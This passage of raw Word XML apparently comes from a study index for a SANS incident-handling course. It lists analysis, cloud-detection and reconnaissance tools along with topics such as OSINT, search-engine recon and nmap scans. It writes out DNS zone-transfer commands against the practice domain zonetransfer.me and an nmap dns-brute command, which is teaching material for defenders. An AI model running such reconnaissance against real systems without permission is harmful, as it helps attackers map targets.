            <w:tcW w:w="6119" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="159CEE47" w14:textId="32D71E73"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Regshot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Regshot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="20CEDB0B" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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01B7DF13"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 Microsoft tool to monitor operating environment</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t>Summarizing Process Monitor Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="58E67450" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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0017F167" w14:textId="05F57F59"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IDA Pro (includes </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>decompiler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Hex-Rays)</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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805BDCB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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402A3622" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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3A24BABB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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6F73F347" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Detection: Cloud Analysis Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6BB06428" w14:textId="5E66252B" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AWS GuardDuty</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>Azure Sentinel</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">GCP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CloudArmor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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119" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="733B479C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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7EE727F8" w14:textId="508C210F"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describe-volumes</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w: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3AAA43E0" w14:textId="2ADD22F5" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00000000" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="00303D06" w:rsidRPr="006F5A04">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>s3logparse.py</w:t>
              </w:r>
            </w:hyperlink>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7C8C2240" w14:textId="0092C7B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7599AA06" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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1EEFB546" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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5270EA8" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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1732BA69" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2BAC6327" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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3A49A1AD" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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029174DF" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="15D04AEC" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D2B7C30" w14:textId="0EF7CB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We Integrate SEC504 with ATT&amp;CK</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24ABE3E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3DEC3161" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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7153AAF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51ADA6D3"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whois</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31D3154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3A81376" w14:textId="0DE5BB2E" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:color w:val="1155CC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="single" w:color="1155CC"/>
              </w:rPr>
              <w:t>crt.sh</w:t>
            </w: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7777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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414A94F9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:ind w:right="1677"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>haveibeenpwned</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whatsmyname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="40232E58" w14:textId="6541F6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SpiderFoot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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09E44A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7DB9B28F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="772A4550" w14:textId="3D5533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Certificate Transparency: The New WHOIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BB20BCC" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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1612327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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E3997D9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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53276BC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27B1A3A4" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E275887" w14:textId="20EC822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Not OSINT Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767C29A7" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1456DA31" w14:textId="2626DD0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FD3A47" w14:textId="2A5E9B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2E933D7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nslookup  dig</w:t>
            </w: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0A932B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6799E5D" w14:textId="61A904D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nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  server 81.4.108.41  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>settype</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=AXFR  ls -d zonetransfer.me  tcp/port 53</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4B08F5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7E044BB1" w14:textId="2C2BC8C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dig @81.4.108.41 AXFR zonetransfer.me</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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2170B443" w14:textId="26C2733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sudo nmap --script dns-brute</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31D100E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UNIX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EB0CA60" w14:textId="0CCB585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whois</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3A1BDD7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3A426A6D" w14:textId="70095E31" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:color w:val="1155CC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="single" w:color="1155CC"/>
              </w:rPr>
              <w:t>crt.sh</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5A0C896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5F709460" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2E0121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7C6810E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34D232A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BEE6C06" w14:textId="225F340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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaisance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="548BE44F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014AD535" w14:textId="395B1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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaisance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE208A7" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Exiftool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62C24F89" w14:textId="1830DA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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08E0DED3" w14:textId="2533E131"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CeWL</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060FEEE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Reconnaisance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with Search Engines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5252DC22"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p>
          <w:p w14:paraId="08A954C5" w14:textId="4FD3DB31"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Google Hacking Database</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304B7761" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Web-Based Recon/Attack Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D8CD4A6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:ind w:right="1082"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>www.shodan.io  www.network-tools.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A6C34B4" w14:textId="6EC6A2B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viewdns.info  www.securityspace.com</w:t>
            </w:r>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57974CB6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08550B71" w14:textId="2C8C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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaisance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Defenses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41A4B3CF" w14:textId="555D527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robots.txt</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1FFF238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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaisance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B9E6829" w14:textId="7830C4F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60EE743A" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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459F79CA" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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504167AF"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TCP SYN to port 43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A601BDC"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TCP ACK to port 80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70ACB880" w14:textId="0419AF9A"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ICMP Timestamp Request</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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F36C877" w14:textId="687250E7"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0.0.0.0</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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3865F402" w14:textId="0496A356"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--traceroute</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34E82A51" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7526FBB6" w14:textId="66577D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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73936F8C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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6ED612F4" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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4A01A7E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Three-Way Handshake</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63DDA5AB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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288529DE" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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01F5FC1C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
